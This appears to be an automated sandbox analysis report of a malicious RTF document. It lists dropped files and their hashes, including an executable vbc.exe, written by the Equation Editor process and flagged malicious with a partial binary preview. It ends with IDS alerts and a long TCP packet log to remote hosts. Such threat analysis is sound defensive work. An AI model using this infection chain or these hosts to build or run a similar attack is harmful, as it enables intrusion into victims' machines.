                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\3nkW4MtwSD.LNK
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 26 00:24:08 2021, mtime=Fri Nov 26 00:24:08 2021, atime=Fri Nov 26 00:24:12 2021, length=22268, window=hide
                                                            Category:dropped
                                                            Size (bytes):1014
                                                            Entropy (8bit):4.543786462395175
                                                            Encrypted:false
                                                            SSDEEP:12:8w5eFgXg/XAlCPCHaX6zBFB/IGUX+WNwfLkx0sOicvbSRkCl4S0seDtZ3YilMMEO:8w5y/XTKz3WhrHte2NHeDv3qlQd7Qy
                                                            MD5:0CAB2B6943F0D12CA4B6285B22202999
                                                            SHA1:AD018F3F3F6BAC905FC8999CCBAD2190A60FDCA0
                                                            SHA-256:A993ED6EB3B351B317C05744C641294B9A2CD735E57E8BBF4666C74C222C74FC
                                                            SHA-512:8424761740A2D9AEBC20190AC3FF290B782FC1B2C92E45FD6BE91376F47A0C4542EFB59437B8C7C587BE2892721E7EE749C3B63D307BA09CE6D0227C7E9CCB39
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: L..................F.... ...(..Od...(..Od.....Qd....V...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1.....zS....Desktop.d......QK.XzS..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..V..zS.. .3NKW4M~1.RTF..J......zS..zS..*.........................3.n.k.W.4.M.t.w.S.D...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\287400\Users.user\Desktop\3nkW4MtwSD.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.3.n.k.W.4.M.t.w.S.D...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......287400..........D_....3N...W...9..g............[D_....3N...W...9..g...
                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):72
                                                            Entropy (8bit):4.891962939381966
                                                            Encrypted:false
                                                            SSDEEP:3:bDuMJlHCoP/SmxWJToP/Sv:bCICoXeToXc
                                                            MD5:98198491AD9C6556CF158DF33B3EC4E5
                                                            SHA1:5FDDCDD11FD061308338442F8CDDFB10E536A397
                                                            SHA-256:E97FB0507D819A0D2EE95DFB51A9544E4907033C8F2FA486B6F4B584572EA5B8
                                                            SHA-512:6876CE8FE8FA0A5B1C7956B664F95FD1D0EA0CF69C719A82BF3EAE7830CC70C66D0AB9F266568C804D8FF1C85E60E43977A2481B12728CD0FBC074A3FF66D5BE
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: [folders]..Templates.LNK=0..3nkW4MtwSD.LNK=0..[misc]..3nkW4MtwSD.LNK=0..
                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.503835550707526
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
                                                            MD5:6462452E1083FFF3724A32DC01771E8B
                                                            SHA1:244116899824E727C5C399064F004C71D88F7254
                                                            SHA-256:869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
                                                            SHA-512:303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
                                                            Malicious:false
                                                            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                            C:\Users\user\Desktop\~$kW4MtwSD.rtf
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):162
                                                            Entropy (8bit):2.503835550707526
                                                            Encrypted:false
                                                            SSDEEP:3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
                                                            MD5:6462452E1083FFF3724A32DC01771E8B
                                                            SHA1:244116899824E727C5C399064F004C71D88F7254
                                                            SHA-256:869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
                                                            SHA-512:303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
                                                            Malicious:false
                                                            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                            C:\Users\Public\vbc.exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):739840
                                                            Entropy (8bit):7.768720486449457
                                                            Encrypted:false
                                                            SSDEEP:12288:QBzcmhiTyq+0tWTpvmEwyd2NR5SR72R6/NHJbBMa59mO/1flaMMdrixBFmRq:QBomhi+2WYEFdqu5NHJbBMa5Mdri1Wq
                                                            MD5:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            SHA1:984A18333BCD137D00A2223A10B83946F0B3949D
                                                            SHA-256:42173F59707DE5929C3BC6CD37D5E0DC55D990BCE2C29AA6DEAC6E86C3EEC250
                                                            SHA-512:D00A949F26740996D4DA000ABC5B5241D812D3C7D1A1D0A92863A11F825B79333F20B4105BB2EAAD67472F1229E35BD6E056A27BE5C4418D639D18AEED3FC676
                                                            Malicious:true
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............0..>...........[... ...`....@.. ....................................@.................................l[..O....`..H............................................................................ ............... ..H............text....<... ...>.................. ..`.rsrc...H....`.......@..............@..@.reloc...............H..............@..B.................[......H........H...!..........|j................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........

                                                            Static File Info

                                                            General

                                                            File type:Rich Text Format data, unknown version
                                                            Entropy (8bit):4.083855353458583
                                                            TrID:
                                                            • Rich Text Format (5005/1) 55.56%
                                                            • Rich Text Format (4004/1) 44.44%
                                                            File name:3nkW4MtwSD.rtf
                                                            File size:22268
                                                            MD5:5aad2b6635b3069402aaf6ff389bea64
                                                            SHA1:a8617ddffd6c934fcf3f64c6e84b1a23ffa9d092
                                                            SHA256:718dcc870c0de487595feed4e5e43dc70fba6fa2aaac15462c0ba5c20028e7bd
                                                            SHA512:2bcdcc3775f8d2a163b8b564232a5839fe625b8ab7f8b6de613b57abf436e6acb095d5bc2a081e966aa4422a9edb9a81df031d4da40add21cef4404aa45a5d3d
                                                            SSDEEP:384:hPD5SVOnYJqhGw3DUDFoI/QzRckPc/4XHry8MVxAy7aD+e:hPD5SInYEhGwGFoIcluHVxB7a
                                                            File Content Preview:{\rtf6611&-+4!?7$>|.|:+%]_.!4#&.2`(2.?1-..+|$>=8+.030+4*?%/+~,<667<???%)/|>!|!.%|^?`.3'?|8-)?'%%$6^;,?%7.$?983(2(+?.?|=.8?8|*7,!5_^]5|7,[??3.!.0')?8.?6&53.;`'?/2%??41?%_+*`)%^-*&>,96(.[~3?2.=,`78)!%?81^)736.@[_?.67%?+-&:@??=>0>;3)?.+0]=?~?_?]?$82;@%7=~<3!

                                                            File Icon

                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                            Static RTF Info

                                                            Objects

                                                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                            000000B6Chno
                                                            100000B35hno

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            11/25/21-17:25:23.079817TCP1201ATTACK-RESPONSES 403 Forbidden804916634.102.136.180192.168.2.22
                                                            11/25/21-17:25:43.645796TCP1201ATTACK-RESPONSES 403 Forbidden804916734.102.136.180192.168.2.22

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2021 17:23:57.693909883 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:57.811109066 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:57.811188936 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:57.811558008 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:57.931919098 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:57.931982994 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:57.932010889 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:57.932039022 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:57.932213068 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:57.932466984 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.049350023 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049417019 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049448013 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049487114 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049524069 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049561977 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049599886 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049638033 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049710989 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.049772024 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.049779892 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.166820049 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.166877985 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.166917086 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.166955948 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.166992903 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167032003 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167072058 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167109013 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167148113 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167171001 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167187929 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167207956 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167215109 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167227983 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167258978 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167267084 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167293072 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167304993 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167326927 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167346001 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167352915 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167386055 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167412043 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167422056 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167445898 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167480946 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.170453072 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284533978 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284571886 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284585953 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284596920 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284611940 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284627914 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284641981 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284657955 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284672022 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284687996 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284703970 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284718990 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284734964 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284749985 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284765005 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284781933 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284796000 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284811974 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284826994 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284842014 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284847975 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284872055 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284884930 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284892082 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284892082 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284909010 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284914017 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284919024 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284928083 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284946918 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284957886 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284965992 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284976006 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284985065 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284992933 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.285003901 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.285022020 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.285032034 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.285038948 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.285043955 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.285058022 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.285073996 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.285075903 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.285088062 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.285094976 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.285135984 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.285145044 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.287367105 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402185917 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402247906 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402287006 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402324915 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402362108 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402400970 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402439117 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402477026 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402488947 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402517080 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402530909 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402539015 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402554989 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402595043 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402595997 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402616978 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402635098 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402667046 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402673006 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402700901 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402713060 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402731895 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402750015 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402769089 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402790070 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402806044 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402831078 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402858973 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402868032 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402894020 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402911901 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402914047 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402951002 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402987003 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402991056 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.403019905 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.403032064 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.403059959 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.403069019 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.403081894 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.403110027 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.403130054 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.403167009 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404295921 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404339075 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404376984 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404380083 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404417038 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404417992 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404436111 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404459000 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404474020 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404499054 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404520035 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404540062 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404553890 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404580116 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404599905 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404619932 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404634953 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404659986 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404683113 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404696941 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404715061 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404736996 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404743910 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404774904 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404797077 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404813051 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404834986 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404860973 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404881954 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404936075 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404949903 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.404975891 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.404997110 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405014038 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.405028105 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405054092 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.405076981 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405092955 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.405117989 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405132055 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.405158997 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405170918 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.405190945 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405209064 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.405224085 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405246973 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.405272007 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.405303001 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.406614065 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.520653963 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.520713091 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.520742893 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.520772934 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.520811081 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.520874977 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.520925045 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.520965099 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.521033049 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.521090031 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.521100044 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.521106005 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523550034 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523595095 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523633003 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523673058 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523710966 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523721933 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523751020 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523751974 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523758888 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523765087 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523793936 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523809910 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523838043 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523860931 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523884058 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523907900 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523926020 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523931980 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.523967028 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.523987055 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524008036 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524024010 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524048090 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524071932 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524087906 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524110079 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524130106 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524152040 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524166107 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524185896 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524205923 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524219990 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524245977 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524275064 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524282932 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524310112 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.524322033 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.524336100 CET4916580192.168.2.22198.46.199.153
